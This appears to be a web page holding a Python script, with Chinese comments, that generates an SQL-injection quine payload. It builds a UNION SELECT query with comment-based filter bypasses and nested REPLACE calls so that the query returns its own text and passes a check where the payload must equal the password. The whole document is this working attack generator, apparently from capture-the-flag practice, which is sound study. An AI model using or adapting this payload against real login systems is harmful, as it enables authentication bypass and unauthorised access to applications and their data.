Logo WEB

Qunie构造脚本(payload==password).py

# replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),replace_B的编码,'replace_A')
# replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),replace_B的编码,"replace_B")

class rep:
    replace_S = ""
    replace_A = ""
    replace_B = ""
    replace_charfuc = ""
    result = ""

    def reppay(self):
        self.replace_S = self.replace_S.replace("REPLACE_BASE", "REPLACE(replace_temp,char_B,'replace_A')")
        self.replace_S = self.replace_S.replace("replace_temp", "REPLACE('replace_A',tempchar_a,tempchar_b)")
        self.replace_A = self.replace_S.replace("'", '"')
        self.replace_A = self.replace_A.replace("replace_A", "replace_B")
        print("-" * 20)
        print("replace_S is " + self.replace_S)
        print("replace_A is " + self.replace_A)
        print("replace_B is " + self.replace_B)
        print("-" * 20)
        self.result = self.replace_S.replace("replace_A", self.replace_A)
        self.result = self.result.replace("replace_B", self.replace_B)
        temp = ""
        tempchar_a = ""
        tempchar_b = ""
        if self.replace_charfuc.lower() == "CHAR".lower():
            temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")"
            tempchar_a = self.replace_charfuc + "(34)"
            tempchar_b = self.replace_charfuc + "(39)"
        elif self.replace_charfuc.lower() == "CHR".lower():
            temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")"
            tempchar_a = self.replace_charfuc + "(34)"
            tempchar_b = self.replace_charfuc + "(39)"
        elif self.replace_charfuc.lower() == "0x".lower():
            temp = self.replace_charfuc + str("".join(hex(ord(self.replace_B)).replace('0x', '')))
            tempchar_a = self.replace_charfuc + "22"
            tempchar_b = self.replace_charfuc + "27"
        else:
            exit("ERROR replace_charfuc")
        self.result = self.result.replace("char_B", temp)
        self.result = self.result.replace("tempchar_a", tempchar_a)
        self.result = self.result.replace("tempchar_b", tempchar_b)
        print("payload is\n")
        print(self.result)


payload = rep()
payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#"  # 需要构造的payload模板,REPLACE部分请用 REPLACE_BASE 代替
payload.replace_B = "B"  # 替换过程中的单个字符,必须是单个字符
payload.replace_charfuc = "0x"  # ANSI转字符用的函数,可以是0x、CHAR、CHR ,大小写都可以
payload.reppay()